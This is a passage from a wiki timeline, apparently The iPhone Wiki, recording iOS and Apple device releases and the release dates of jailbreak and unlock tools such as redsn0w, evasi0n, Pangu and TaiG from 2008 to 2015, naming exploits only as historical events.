* 11 November -- [[iPad Pro (12.9-inch)]] released.
* 10 November -- iOS 9.2 beta 3 and tvOS 9.1 beta 2 released
* 9 November -- tvOS 9.0.1 released.
* 3 November -- iOS 9.2 beta 2 and tvOS 9.1 beta released.

=== October ===
* 29 October -- iOS 9.2 public beta and tvOS 9.0 released.
* 28 October -- [[Pangu9]] 1.0.0 for Mac released.
* 27 October -- [[Pangu9]] 1.2.0 and iOS 9.2 beta released.
* 22 October -- [[Seas0nPass]] 0.9.7 beta released to jailbreak [[K66AP|Apple TV (2nd generation)]] running 6.2.1 tethered.
* 21 October -- [[Pangu9]] 1.1.0, iOS 9.1, tvOS 9.0GM, watchOS 2.0.1 and iTunes 12.3.1 released.
* 15 October -- [[Pangu9]] 1.0.1 released.
* 14 October -- [[Pangu9]] 1.0.0 released to jailbreak iOS 9.0, 9.0.1 and 9.0.2.
* 12 October -- iOS 9.1 beta 5 released.
* 6 October -- iOS 9.1 beta 4 and tvOS 9.0 beta 3 released.

=== September ===
* 30 September -- iOS 9.0.2 and 9.1 beta 3 released.
* 24 September -- iOS 9.0.1 released for iPhone 6s and iPhone 6s Plus.
* 23 September -- iOS 9.0.1 (excluding iPhone 6s and iPhone 6s Plus) , 9.1 beta 2 and tvOS 9.0 beta 2 released.
* 21 September -- watchOS 2.0 released to the public.
* 16 September -- iOS 9.0 released to the public.
* 9 September -- iOS 9.0 [[Golden Master|GM]], watchOS 2.0 [[Golden Master|GM]] and iOS 9.1 beta released to developers. [[iPhone 6s]], [[iPhone 6s Plus]], [[iPad Pro (12.9-inch)]], [[iPad mini 4]] and [[J42dAP|Apple TV HD]] announced.

=== August ===
* 13 August -- iOS 8.4.1 and iTunes 12.2.2 released.
* 6 August -- iOS 9.0 beta 5 and watchOS 2.0 beta 5 released.
* 4 August -- TaiG 1.1.0 for Mac released.
* 2 August -- TaiG 1.0.0 for Mac released.

=== July ===
* 30 July -- iOS 8.4.1 beta 2 released.
* 21 July -- iOS 9.0 beta 4 and watchOS 2.0 beta 4 released.
* 20 July -- [[TaiG]] 2.4.3 released, no longer a beta.
* 16 July -- [[TaiG]] 2.4.3 beta released, optimises jailbreak process.
* 15 July -- [[N102AP|iPod touch (6th generation)]] released.
* 14 July -- iOS 8.4.1 beta released.
* 13 July -- [[TaiG]] 2.4.2 Beta released, fixes 30% and 40% issues as well as bundling Cydia 1.1.23. [[PPJailbreak]] 2.0.0 released to jailbreak iOS 8.1.3 - 8.4 on Mac.
* 11 July -- [[TaiG]] 2.4.1 released.
* 10 July -- [[TaiG]] 2.4.1 Beta released, fixes 60% issue.
* 7 July -- [[TaiG]] 2.3.1 released.
* 6 July -- [[TaiG]] 2.3.1 Beta released, includes Cydia 1.1.20.
* 3 July -- [[TaiG]] 2.3.0 released, which removes the setruid-patch
* 2 July -- [[TaiG]] 2.2.1 released to address a security vulnerability allowing all apps to get root easily.

=== June ===
* 30 June -- iOS 8.4 released. [[TaiG]] 2.2.0 released to jailbreak iOS 8.4.
* 23 June -- [[TaiG]] 2.0.0 released to jailbreak iOS 8.1.3, 8.2 and 8.3.
* 8 June -- Apple announces iOS 9, watchOS 2.0, and a release date of June 30 for iOS 8.4 at [[WWDC]] 2015.

=== May ===
* 15 May -- [[User:geohot|geohot]] [[The iPhone Wiki:Changing Ownership|transfers]] ownership of The iPhone Wiki to [[User:saurik|saurik]].

=== April ===
* 23 April -- iOS 8.2 (build 12S506) released for Apple Watch.
* 8 April -- iOS 8.3 and Apple TV 7.2 released.

=== March ===
* 9 March -- iOS 8.2 released.

=== February ===
* 23 February -- [[TaiG]] updated to version 1.3 to support iOS 8.2 beta and beta 2.
* 12 February -- [[TaiG]] updated to version 1.2.1 to support iTunes 12.1.

=== January ===
* 27 January -- iOS 8.1.3 and 7.0.3 (8.1.3) for Apple TV released.
* 18 January -- [[PPJailbreak]] released to jailbreak iOS 8.0 - 8.1.2 on a Mac.

== 2014 ==
=== December ===
* 9 December -- iOS 8.1.2 released.

=== November ===
* 29 November -- [[TaiG]] released to jailbreak iOS 8.0 - 8.1.1 on all devices except Apple TV.
* 18 November -- iOS 8.1.1 and Apple TV 7.0.2 released.

=== October ===
* 22 October -- [[Pangu8]] for iOS 8.x released.
* 20 October -- iOS 8.1 released.
* 16 October -- [[iPad Air 2]] and [[iPad mini 3]] announced.

=== September ===
* 25 September -- iOS 8.0.2 released.
* 24 September -- iOS 8.0.1 released. Critical bugs affecting Touch ID and cellular service was quickly discovered[http://support.apple.com/kb/HT6487] and the update was retracted.
* 19 September -- Initial release of [[N61AP|iPhone 6]] and [[N56AP|iPhone 6 Plus]].
* 17 September -- iOS 8.0 is released to the public, as well as 6.2.1 for the [[K66AP|Apple TV (2nd generation)]].
* 9 September -- Apple announces the [[Apple Watch (1st generation)]], [[N61AP|iPhone 6]], and [[N56AP|iPhone 6 Plus]].

=== June ===
* 30 June -- iOS 7.1.2 and Apple TV 6.2 released to fix iBeacon connectivity, mail attachments not being encrypted and a bug with data transfers from third party accessories.
* 29 June -- [[Pangu]] 1.1.0 released with lots of improvements.
* 23 June -- [[Pangu]] released to jailbreak iOS 7.1.x untethered.
* 1 June -- [[p0sixspwn]] updated to version 1.0.8 to support iOS 6.1.6 and fix iTunes 11.1+ crashes.

=== April ===
* 22 April -- [[iOS]] 7.1.1 and Apple TV 6.1.1 released with bug fixes, including [[Touch ID]] fixes.

=== March ===
* 27 March -- [[evasi0n7]] updated to 1.0.8 to support iOS 7.0 (11A466) that shipped with some 5s and 5c iPhones
* 10 March -- [[iOS]] 7.1, Apple TV iOS 6.1, [[J73AP|iPad Air (iPad4,3)]] and [[J87AP|iPad mini 2 (iPad4,6)]] released.
* 1 March -- [[evasi0n7]] updated to 1.0.7 to fix problem where bundled repository package information could not be refreshed/updated by Cydia and updated bundled Cydia package lists.

=== February ===
* 26 February -- [[iTunes]] updated to 11.1.5 to fix crashing and improve iBooks compatibility on OS X.
* 22 February -- [[evasi0n7]] updated to version 1.0.6 to support iOS 7.0.6.
* 21 February -- [[iOS]] 7.0.6 and iOS 6.1.6 released to address faulty SSL validation.
* 5 February -- [[evasi0n7]] updated to version 1.0.5 to support iOS 7.0.5.

=== January ===
* 29 January -- [[iOS]] 7.0.5 released for [[N49AP|iPhone 5c (iPhone5,4)]] and [[N53AP|iPhone 5s (iPhone6,2)]], fixing network provisioning.
* 22 January -- [[iTunes]] 11.1.4 released, adding Wish List and language improvements.
* 12 January -- [[evad3rs]] releases [[evasi0n7]] 1.0.4 to fix important untether security bugs.
* 11 January -- [[evad3rs]] releases [[evasi0n7]] 1.0.3 to fix [[iPad mini 2]] bootloop issues, support iOS 7.1 beta 3 and include [[Cydia]] 1.1.9.

== 2013 ==
=== December ===
* 31 December -- [[evad3rs]] releases [[evasi0n7]] 1.0.2 to fix [[iPad 2]] bootloop issues.
* 30 December -- [[User:Ih8sn0w|iH8sn0w]], [https://twitter.com/SquiffyPwn SquiffyPwn], and [[User:winocm|winocm]] release [[p0sixspwn]], an [[untethered jailbreak]] for iOS 6.1.3 through 6.1.5, for Mac OS X.
* 24 December -- [[evad3rs]] releases [[evasi0n7]] 1.0.1 to completely remove Chinese piracy store.
* 22 December -- [[evad3rs]] releases [[evasi0n7]], an [[untethered jailbreak]] for iOS 7.0 through 7.0.4.

=== November ===
* 14 November -- [[iOS]] 7.0.4, 6.1.5 for iPod touch (4th generation) to fix [[FaceTime]] bugs and [[List of Apple TVs|Apple TV]] 6.0.2 released.
* 1 November -- [[iPad Air]] released.

=== October ===
* 24 October -- Apple TV firmware updated to 6.0.1.
* 22 October -- [[iOS]] 7.0.3 released to fix various bugs including a passcode bug. [[iPad Air]] and [[iPad mini 2]] announced.

=== September ===
* 26 September -- [[iOS]] 7.0.2 released to address Lock screen issues.
* 23 September -- Apple releases a patched version of the Apple TV 6.0 update.
* 20 September -- Initial release of [[iPhone 5c]] and [[iPhone 5s]]. iOS 7.0.1 is also made available for these devices. A 6.0 update for the Apple TV was also released, but is pulled due to problems.[http://www.macrumors.com/2013/09/22/apple-pulls-apple-tv-6-0-update-following-reports-of-bricking/]
* 18 September -- [[iOS]] 7.0 released for the [[iPad 2]] and newer, [[iPad mini]], [[iPhone 4]] and newer, [[iPod touch (4th generation)]].
* 10 September -- Apple announces the [[iPhone 5c]] and [[iPhone 5s]].

=== June ===
* 25 June -- [[iFaith]] 1.5.9 released.
* 19 June -- Apple TV firmware 5.3 released.
* 10 June -- Apple unveils a completely-revamped [[iOS]] 7 at [[WWDC]].

=== May ===
* 30 May -- Apple quietly unveils a 16 GB version of the [[N78aAP|iPod touch (5th generation)]] that omits the rear camera, replacing the [[N81AP|iPod touch (4th generation)]].
* 2 May -- [[iOS]] 6.1.4 released for [[iPhone 5]].

=== April ===
* 13 April -- [[iFaith]] updated to version 1.5.8.
* 11 April -- [[Sn0wbreeze]] updated to version 2.9.14.
* 10 April -- [[iFaith]] updated to version 1.5.7.

=== March ===
* 10 March -- [[iFaith]] updated to version 1.5.6.
* 19 March -- Apple releases [[iOS]] 6.1.3 to patch multiple security-related bugs and improve Maps for Japanese users.
* 12 March -- [[evad3rs]] updated [[evasi0n]] to 1.5.3.
* 11 March -- [[evad3rs]] updated [[evasi0n]] to 1.5.2.
* 10 March -- [[iFaith]] updated to version 1.5.5.
* 5 March -- [[evad3rs]] updated [[evasi0n]] to 1.5.1.

=== February ===
* 23 February -- [[iFaith]] updated to version 1.5.4.
* 23 February -- [[evad3rs]] updated [[evasi0n]] to 1.5. [[iFaith]] updated to version 1.5.3.
* 19 February -- Apple releases [[iOS]] 6.1.2 as a hotfix to address Exchange issues. [[Evasi0n]] was updated to support iOS 6.1.2 later the same day.
* 13 February -- [[Seas0nPass]] updated to support [[iOS]] 5.2 for the [[K66AP|Apple TV (2nd generation)]] [[untethered jailbreak]].
* 11 February -- Apple releases [[iOS]] 6.1.1 for the [[N94AP|iPhone 4s]] as a hotfix to address connectivity issues. [[evasi0n]] was updated to support [[iOS]] 6.1.1 later the same day.
* 4 February -- The [[evad3rs]] release [[evasi0n]] to [[jailbreak]] [[iOS]] 6.x.

=== January ===
* 28 January -- Apple releases [[iOS]] 6.1.

== 2012 ==
=== December ===
* 18 December -- Apple releases [[iOS]] 6.0.2 containing bug fixes for the [[iPhone 5]] and [[iPad mini]].

=== November ===
* 30 November -- Apple releases [[iTunes]] 11.
* 12 November -- [[sn0wbreeze]] is updated to version 2.9.7.
* 2 November -- Inital release of [[iPad (4th generation)]] and [[iPad mini]] in first set of countries.
* 1 November -- Apple releases [[iOS]] 6.0.1.

=== October ===
* 23 October -- Apple announces new [[iPad (4th generation)]] and [[iPad mini]].
* 14 October -- The [[iPhone Dev Team]] releases [[redsn0w]] 0.9.15b1, which lets A5(X) users with the appropriate [[SHSH]] blobs remain on, or update to, [[iOS]] 5.x.

=== September ===
* 21 September -- Initial release of [[iPhone 5]] in first set of countries.
* 19 September -- Apple releases [[iOS]] 6.
* 12 September -- Apple announces new [[iPhone 5]] and release date of iOS 6.

=== June ===
* 18 June -- [[iPhone Dev Team]] releases a new version of [[redsn0w]] (0.9.14b1), adding the capability to downgrade iPhone [[N82AP|3G]]/[[N88AP|3GS]] [[Baseband]] from the [[06.15.00]] iPad baseband to the latest unlockable iPhone baseband ([[05.13.04]]). This allows 3G/3GS users that had upgraded to the iPad baseband, thus losing the GPS function and the ability to restore to stock firmware, to get back to an iPhone baseband, making their devices behave as intended again, as well as being unlockable by [[ultrasn0w]].
* 14 June -- [[iPhone Dev Team]] releases a developer version of [[redsn0w]] (0.9.13dev1), which jailbreaks [[limera1n]] susceptible devices running [[iOS]] 6.0 beta. This version doesn't hacktivate nor install [[Cydia]], as it hasn't been ported to [[iOS]] 6 just yet. This jailbreak, however, installs afc2 and SSH, enabling developers to fix and prepare their apps to the next [[iOS]] version.
* 11 June -- Apple announces [[iOS]] 6 at [[WWDC]] 2012, and seeds the first beta to developers.

=== May ===
* 25 May -- The [[Chronic Dev (team)|Chronic Dev Team]] releases [[Absinthe]] 2.0, providing an [[untethered jailbreak]] for all devices except the [[Apple TV]]s and [[K93AAP|iPad 2 (iPad2,4)]]. ([[Seas0nPass]] was also updated to include [[Absinthe]]'s [[untethered jailbreak|untether]] for the [[K66AP|Apple TV (2nd generation)]].)
* 7 May -- Apple releases [[iOS]] 5.1.1.

=== March ===
* 7 March -- Apple releases [[iOS]] 5.1 and announces new devices: [[iPad (3rd generation)]], [[J33AP|Apple TV (3rd generation)]], and the [[K93AAP|iPad 2 (iPad2,4)]].

=== January ===
* 20 January -- [[Absinthe]] was released to [[jailbreak]] and [[untethered jailbreak|untether]] the [[A5]] devices running [[iOS]] 5.0 and 5.0.1.
* 18 January -- Apple announces [[iBooks.app|iBooks version 2.0]].

== 2011 ==
=== December ===
* 30 December -- [[User:pod2g|pod2g]]'s [[untethered jailbreak|untether]] for [[iOS]] 4.4.4 makes its way into a new version of [[Seas0nPass]] for [[K66AP|Apple TV (2nd generation)]] owners.
* 27 December -- [[User:pod2g|pod2g]]'s [[untethered jailbreak|untether]] for [[iOS]] 5.0.1 is released in new versions of [[PwnageTool]] and [[redsn0w]], and as a Cydia package called [[Corona]] (by the [[Chronic Dev (team)|Chronic Dev Team]]) for devices already jailbroken on 5.0.1.
* 15 December -- Apple releases [[iOS]] 4.4.4 for the [[K66AP|Apple TV (2nd generation)]], as well as a minor update (5.0.1 build 9A406) for the [[N94AP|iPhone 4s]] to address SIM card issues.
* 4 December -- [[iFaith]] 1.4 is released, which can circumvent the [[APTicket]] [[nonce]] on devices vulnerable to [[limera1n]]'s exploit.

=== November ===
* 10 November -- [[iOS]] 5.0.1 is released in an attempt to fix battery-related issues. It's the first non-beta available as an [[OTA Updates|OTA update]].

=== October ===
* 14 October -- The [[N94AP|iPhone 4s]] is officially released, although some preorders were delivered early.
* 12 October -- [[iOS]] 5.0 is released. The [[N94AP|iPhone 4s]] IPSW came with [[04.11.08]] due to a goof on Apple's side.
* 5 October -- Steve Jobs passes away.
* 4 October -- Apple announces the new [[N94AP|iPhone 4s]].

=== September ===
* 19 September -- [[redsn0w]] 0.9.9 beta 1 is released, introducing a new UI and many features (like submitting [[SHSH]]s to the [[Cydia Server]].
* 17 September -- [[MyGreatFest]], first iCommunity and jailbreak centered convention was held.

=== July ===
* 15 July -- Apple releases [[iOS]] 4.2.9 and 4.3.4, patching all jailbreaking-related vulnerabilities (aside from those in the [[bootrom]]).
* 6 July -- [[User:Comex|comex]] releases [[Saffron]], the first public [[jailbreak]] for the [[iPad 2]].
* 2 July -- A beta version of the upcoming [[jailbreak]] from [[User:comex|comex]] for the [[iPad 2]], making use of a PDF exploit, was leaked. A hotfix by Apple is expected very soon.

=== June ===
* 1 June -- [[User:ih8sn0w|iH8sn0w]] releases [[iFaith]] to dump [[SHSH]] blobs from a device.

=== May ===
* 6 May -- [[PwnageTool]], [[redsn0w]], and [[sn0wbreeze]] are updated for [[iOS]] 4.3.3 support (and in the case of sn0wbreeze, [[iOS]] 4.2.8 support as well).
* 3 May -- Apple releases [[iOS]] 4.2.8 and 4.3.3 to address the location-tracking controversy. Once more, current [[untethered jailbreak|untethering]] vulnerabilities remained unpatched.

=== April ===
* 24 April -- [[PwnageTool]], [[redsn0w]], and [[sn0wbreeze]] are updated for [[iOS]] 4.3.2 support (and in the case of sn0wbreeze, [[iOS]] 4.2.7 support as well).
* 14 April -- Apple releases [[iOS]] 4.2.7 and 4.3.2 to fix security issues and connection issues for [[K95AP|iPad 2 (iPad2,3)]], but leaves [[untethered jailbreak|untethering]] vulnerabilities unpatched.
* 3 April -- All major jailbreak tools ([[redsn0w]], [[PwnageTool]], [[sn0wbreeze]]) get updated to includes [[i0n1c]]'s [[untethered jailbreak|untether]] code to jailbreak devices compatible with iOS 4.3.1 except the [[iPad 2]].

=== March ===
* 25 March -- Apple releases iOS 4.3.1, properly blocking [[User:comex|comex]]'s [[IOSurface Kernel Exploit|exploit]].
* 13 March -- [[User:Comex|comex]] shows a remotely jailbroken [[K95AP|iPad 2 (iPad2,3)]].
* 11 March -- Release of the [[iPad 2]] in the USA. The exploits for [[limera1n]] ([[User:Geohot|geohot]]), [[SHA-1 Image Segment Overflow|SHAtter]] ([[User:posixninja|p0sixninja]]), and [[comex]]'s [[kernel]] exploit were closed by Apple.
* 9 March -- Apple releases [[iOS]] 4.3, fixing the [[HFS Legacy Volume Name Stack Buffer Overflow]] vulnerability.

=== February ===
* 15 February -- New version of both [[PwnageTool]] and [[sn0wbreeze]] were released to support 4.2.1 and untethered using the [[feedface]] exploit.
* 7 February -- The [[Chronic Dev (team)|Chronic Dev Team]] release a version of [[greenpois0n (jailbreak)|greenpois0n]] to jailbreak the [[N92AP|iPhone 4 (iPhone3,3)]], using the [[HFS Legacy Volume Name Stack Buffer Overflow]].
* 3 February -- [[User:Jaywalker|Jaywalker]] of the [[Chronic Dev (team)|Chronic Dev Team]] posts [https://www.youtube.com/watch?v=T3NYPVT13xw a video] of custom boot using a soon to be released version of [[Greenpois0n (jailbreak)|greenpois0n]].

=== January ===
* 12 January -- Apple discontinues [[iOS]] support for [[N82AP|iPhone 3G]] and [[N72AP|iPod touch (2nd generation)]] since today's beta release of [[iOS]] 4.3. Also first time a beta [[iOS]] for [[K66AP|Apple TV (2nd generation)]] is released.
* 11 January -- Verizon announces [[N92AP|iPhone 4 (iPhone3,3)]].

== 2010 ==
=== November ===
* 28 November -- [[ultrasn0w]] 1.2 is released by the [[iPhone Dev Team]] to unlock [[N82AP|iPhone 3G]] and [[N88AP|iPhone 3GS]] on baseband 6.15.00
* 22 November -- Apple releases [[iOS]] 4.2.1 (respectively 4.2 for [[K66AP|Apple TV (2nd generation)]])

=== October ===
* 31 October -- The [[iPhone Dev Team|Dev Team]] releases [[redsn0w]] 0.9.6b2 which jailbreaks [[iOS]] 4.1, 4.2 and 3.2.2 on every device available at the time of release (except for iPod touch (2nd generation) MC). It also includes "DFU" button allowing to flash custom [[IPSW]] from Windows [http://blog.iphone-dev.org/post/1452044444/redsn0w-limera1n-fun (see blog post)].
* 20 October -- The [[iPhone Dev Team|Dev Team]] releases [[PwnageTool]] 4.1 which jailbreaks [[iOS]] 4.1 and 3.2.2 on every device available at the time of release. [http://blog.iphone-dev.org/post/1359246784/20102010-event (see blog post)]
* 18 October -- [[Chronic Dev (team)|Chronic Dev Team]] releases [[Greenpois0n (jailbreak)|greenpois0n]] RC4 which added support for iPod touch (2nd generation) (MC and MB) for an untethered jailbreak using [[User:comex|comex]]'s kernel exploit and the [[usb_control_msg(0xA1, 1) Exploit]].
* 12 October -- [[Chronic Dev (team)|Chronic Dev Team]] releases [[Greenpois0n (jailbreak)|greenpois0n]] after switching its exploit from [[SHA-1 Image Segment Overflow|SHAtter]] to [[limera1n]], in the hope that [[SHA-1 Image Segment Overflow|SHAtter]] remains for 5th generation devices. (The exploit [[limera1n]] uses was fixed in the [[iBoot (Bootloader)|iBoot]] revision found in [[iOS]] 4.2 beta 2, which means Apple knows about the vulnerability and the next [[bootrom]] revision may have it patched.)
* 10 October -- Following the first [[limera1n]] beta release, [[User:geohot|geohot]] released multiple versions, each fixing bugs affecting previous releases. [[Chronic Dev (team)|Chronic Dev Team]] officialy anounces that, in order to keep [[SHA-1 Image Segment Overflow|SHAtter]] undisclosed and possibly preserve it for 5th generation devices, [[Greenpois0n (jailbreak)|greenpois0n]] would be delayed in order to incorporate this new exploit [[limera1n]] uses.
* 9 October -- In order to push [[Chronic Dev (team)|Chronic Dev Team]] to change the exploit used on [[Greenpois0n (jailbreak)|greenpois0n]], [[User:geohot|geohot]] rushed out a beta version of [[limera1n]].
* 8 October -- [[User:Geohot|Geohot]] comes back to the scene with a new [[bootrom]] exploit believed to work on all devices, as shown on the resurrected [http://www.limera1n.com limera1n web site]. He prompts [[Chronic_Dev_(team)|Chronic Dev Team]] to use his exploit instead of [[SHA-1 Image Segment Overflow|SHAtter]], but, since [[Greenpois0n (jailbreak)|greenpois0n]] is already scheduled to October 10, it may be not possible. [[User:Geohot|Geohot]] ETA'd his [[limera1n]] release to October 11, if [[Greenpois0n (jailbreak)|greenpois0n]] can't be changed to use this new exploit. This decision, however, would burn 2 [[bootrom]] exploits: [[SHA-1 Image Segment Overflow|SHAtter]] itself and the one used by [[limera1n]], which is unpatchable by firmware updates.
* 6 October -- Chronic Dev Team issues expected ETA of [[Greenpois0n (jailbreak)|greenpois0n]] as October 10, featuring the new [[SHA-1 Image Segment Overflow|SHAtter]] exploit for devices with the [[S5L8930]].

=== September ===
* 30 September -- [[User:MuscleNerd|MuscleNerd]] of the [[iPhone Dev Team]] posts [http://www.youtube.com/watch?v=adVp-IxcDHI the first video] of an [[K66AP|Apple TV (2nd generation)]] jailbroken via [[SHA-1 Image Segment Overflow|SHAtter]].
* 27 September -- [[User:MuscleNerd|MuscleNerd]] of the [[iPhone Dev Team]] posts [http://www.youtube.com/watch?v=aoX1Q8ym2J8 the first video] of an [[N81AP|iPod touch (4th generation)]] jailbroken via [[SHA-1 Image Segment Overflow|SHAtter]].
* 20 September -- [[User:pod2g|pod2g]] discloses details about the [[usb_control_msg(0xA1, 1) Exploit‎]] here at The iPhone Wiki. It was used in [[redsn0w]] the following day.
* 9 September -- The existence of [[SHA-1 Image Segment Overflow|SHAtter]] is revealed. Further details were not released, however.
* 8 September -- Apple releases the [[N81AP|iPod touch (4th generation)]], and iOS 4.1, closing the [[AT+XAPP Vulnerability]].
* 1 September -- Apple event. They announced the new [[N81AP|iPod touch (4th generation)]], [[K66AP|Apple TV (2nd generation)]], iOS 4.1, and [[iTunes]] 10.

=== August ===
* 12 August -- [[Saurik]] releases the first version of PDF Patcher, which installs Apple's patch for the FreeType vulnerability (used in conjunction with other exploits by [[Star]]). It works on firmwares as far back as 2.x, and renders [[iOS]] 3.2.2 and 4.0.2 useless for jailbreakers. Jailbreaking and installing this patch is currently the only way for users of first generation iPod touches and iPhones to protect themselves against malicious use of the exploit.
* 11 August -- Apple releases [[iOS]] 4.0.2 for [[List of iPhones|iPhone]]/[[List of iPod touches|iPod touch]] and [[iOS|iPhone OS]] 3.2.2 for [[K48AP|iPad]] as a hotfix for [[Star]]'s exploits. [[Ultrasn0w]]'s exploit remains, since there's no [[Baseband Firmware|baseband]] update on those versions.
* 3 August -- Just before midnight in [[User:planetbeing|planetbeing]]'s timezone [[ultrasn0w]] has been released by the [[iPhone Dev Team]] to [[unlock]] the [[N90AP|iPhone 4]].
* 1 August -- [[User:Comex|comex]] releases [[Star]], a [[jailbreak]] for all iDevices with [[iOS|iPhone OS]] 3.1.2 through [[iOS]] 4.0.1.

=== July ===
* 30 July -- [[N90AP|iPhone 4]] is released in major countries (second wave).
* 26 July -- Jailbreaking is now officially legal in the U.S.A.: [http://www.eff.org/press/archives/2010/07/26 EFF Wins New Legal Protections for Cell Phone Jailbreakers and Unlockers]
* 15 July -- Apple releases [[iOS|iPhone OS]] 3.2.1 and [[iOS]] 4.0.1.

=== June ===
* 24 June -- [[N90AP|iPhone 4]] is launched.
* 22 June -- [[iPhone Dev Team]] releases [[PwnageTool]] 4.0 and later 4.0.1 for all devices on 4.0 except those with newer [[bootrom]]s (some [[N72AP|iPod touch (2nd generation)]] and [[N88AP|iPhone 3GS]] devices, and all [[N18AP|iPod touch (3rd generation)]] and newer devices).
* 21 June -- [[iPhone Dev Team]] releases [[redsn0w]] 0.9.5 to [[jailbreak]] 4.0 on [[N82AP|iPhone 3G]] and [[N72AP|iPhone touch (2nd generation)]] ([[Bootrom 240.4|old bootrom]]), [[iPhone Dev Team]] releases [[ultrasn0w]] 0.93, an unlock for baseband firmwares [[04.26.08]], [[05.11.07]], [[05.12.01]], and [[05.13.04]] and Apple releases [[iOS]] 4.0
* 19 June -- [[User:Geohot|geohot]] holds a speech at the [[Nuit du hack 2010|Nuit du Hack]]

=== May ===
* 3 May -- Windows version of [[Spirit]] has been updated to not require Windows 98 compatibility mode to run and fixed a photo deletion issue.
* 2 May -- [[User:Comex|comex]] releases [[Spirit]], an [[untethered jailbreak]] for all iDevices with [[iOS|iPhone OS]] 3.1.2 through 3.2.

=== April ===
* 3 April -- Apple releases the [[K48AP|iPad]].

=== February ===
* 12 February -- [[User:sherif hashim|sherif_hashim]] discovers [[AT+XAPP Vulnerability]] and passes it to [[User:MuscleNerd|MuscleNerd]], an elite member of the [[iPhone Dev Team]]
* 2 February -- Apple releases [[iOS|iPhone OS]] 3.1.3, closing [[usb_control_msg(0x21, 2) Exploit|usb_control_msg(0x21, 2)]] vulnerability used by [[blackra1n]], [[redsn0w]], et. al.

== 2009 ==
=== November ===
* 3 November -- [[User:Geohot|geohot]] releases [[blackra1n]] RC3, a software jailbreak for all devices. Includes a new unlock for baseband [[05.11.07]] called [[blacksn0w]] and is also noticeably faster than previous versions.

=== October ===
* 11 October -- [[User:Geohot|geohot]] releases [[blackra1n]] RC1, a 30 second software jailbreak for all devices, including a [[tethered jailbreak]] for the [[N18AP|iPod touch (3rd generation)]], and [[N88AP|iPhone 3GS]] and [[N72AP|iPod touch (2nd generation)]] units with newer bootrom revisions.

=== September ===
* 24 September -- [[User:iH8sn0w|iH8sn0w]] discovers the [[AT+XEMN Heap Overflow|AT+XEMN]] crash independently.
* 9 September -- The [[N18AP|iPod touch (3rd generation)]] with [[S5L8922]] processor is released. [[N72AP|iPod touch (2nd generation)]] and [[N88AP|iPhone 3GS]] units continue shipping, but with a new bootrom ([[Bootrom 240.5.1|240.5.1]] and [[Bootrom 359.3.2|359.3.2]] respectively) that is no longer vulnerable to the [[0x24000 Segment Overflow]].
* 9 September -- Apple releases [[iOS|iPhone OS]] 3.1 (7C144) for iPhones and 3.1.1 (7C145) for iPod touches, closing the [[iBoot Environment Variable Overflow]] and [[AT+XLOG Vulnerability|AT+XLOG]] + [[AT+FNS]] Baseband Exploits.

=== July ===
* 14 July -- [[User:Geohot|geohot]] releases [[purplesn0w]], a software unlock for the [[X-Gold 608]] using [[AT+XLOG Vulnerability|the same exploit as ultrasn0w]], but handled differently. Minutes later, an explanation and source code was posted.
* 7 July -- The [[iPhone Dev Team]] updates [[redsn0w]] and [[ultrasn0w]] to version 0.8, now with [[N88AP|iPhone 3GS]] support. Saurik also updates [[WinterBoard]] to support the [[N88AP|iPhone 3GS]].
* 3 July -- [[User:Geohot|geohot]] releases [[purplera1n]], a software [[jailbreak]] for the [[N88AP|iPhone 3GS]].

=== June ===
* 28 June -- [[User:Geohot|geohot]] posts pictures on his blog of the first fully jailbroken [[N88AP|iPhone 3GS]].
* 25 June -- It's discovered that [[N88AP|iPhone 3GS]] is vulnerable to the [[0x24000 Segment Overflow]].
* 24 June -- The [[iPhone Dev Team]] releases [[ultrasn0w]], an [[unlock]] for [[X-Gold 608]] thanks to [[AT+XLOG Vulnerability|a new exploit]] discovered by [[User:Oranav|Oranav]].
* 23 June -- [[User:Geohot|geohot]] announces he's found a new exploit in [[iBoot (Bootloader)|iBoot]] he calls [[purplera1n]].
* 19 June -- Release of [[N88AP|iPhone 3GS]] to the public and the release of [[PwnageTool]] 3.0 and [[redsn0w]] for jailbreaking devices running [[iOS|iPhone OS]] 3.0
* 17 June -- Apple releases [[iOS|iPhone OS]] 3.0.
* 8 June -- Apple announces the [[N88AP|iPhone 3GS]].

=== March ===
* 10 March -- Information about the [[0x24000 Segment Overflow]] exploit used for the [[N72AP|iPod touch (2nd generation)]] [[untethered jailbreak]] is released thanks to the combined work of [[chronic]], [[CPICH]], [[User:Posixninja|posixninja]], [[User:Pod2g|pod2g]], [[ius]], [[planetbeing]], [[User:MuscleNerd|MuscleNerd]], and co. after being leaked and sold by [[NitroKey]]. To prevent users wasting their money on a stolen exploit, the Hybrid DevTeam decided to release it immediately.

=== January ===
* 31 January -- The [[iPhone Dev Team]] released [[redsn0w Lite]], a [[tethered jailbreak|tethered]] [[N72AP|iPod touch (2nd generation)]] [[jailbreak]]. It combines the [[ARM7 Go]] vulnerability with the well-established [[pwnage]] flow for other Apple mobile devices. It was bundled in a way that allowed usage on [[iOS|iPhone OS]] 2.2.1 by uploading [[iBoot (Bootloader)|iBoot]] from [[iOS|iPhone OS]] 2.1.1, which is vulnerable to [[ARM7 Go]], to the device while in [[DFU Mode]].
* 29 January -- Apple releases [[iOS|iPhone OS]] 2.2.1, closing the [[AT+stkprof]] exploit.
* 25 January -- [[0wnboot]] is released to [http://code.google.com/p/chronicdev/ chronicdev google code page], thanks to [[AriX]], [[User:ChronicDev|chronic]], [[CPICH]], [[westbaer]], [[ius]], [[User:Pod2g|pod2g]], the rest of the iPod devel crew on IRC, and to the #iphone-hax lab rats. Within days, [[AriX]] and the [[Chronic Dev (team)|Chronic Dev Team]] got a ramdisk booting for a [[tethered jailbreak]].
* 17 January -- [[User:MuscleNerd|MuscleNerd]] of the [[iPhone Dev Team]] [https://twitter.com/MuscleNerd/status/1127346766 shows a video demo] of the first jailbroken [[N72AP|iPod touch (2nd generation)]].
* 16 January -- [[ARM7 Go]] vulnerability disclosed where else but here on The iPhone Wiki, for developers to poke and prod at.
* 15 January -- The [[iPhone Dev Team]] [https://twitter.com/iphone_dev/status/1120595069 tweets the VFDecrypt key] for [[iOS|iPhone OS]] 2.2 on [[N72AP|iPod touch (2nd generation)]], demonstrating for the first time that unsigned code can now be run on that device.
* 1 January -- The [[iPhone Dev Team]] releases [[yellowsn0w]] 0.9 beta for baseband [[02.28.00]].

== 2008 ==
=== December ===
* 27 December -- [[25C3 presentation "Hacking the iPhone"]]
* 21 December -- [[User:MuscleNerd|MuscleNerd]], of the [[iPhone Dev Team]] does a live demo of the 3G unlock, dubbed as [[yellowsn0w]]: http://qik.com/video/729275

=== November ===
* 21 November -- Apple releases [[iOS|iPhone OS]] 2.2.

=== September ===
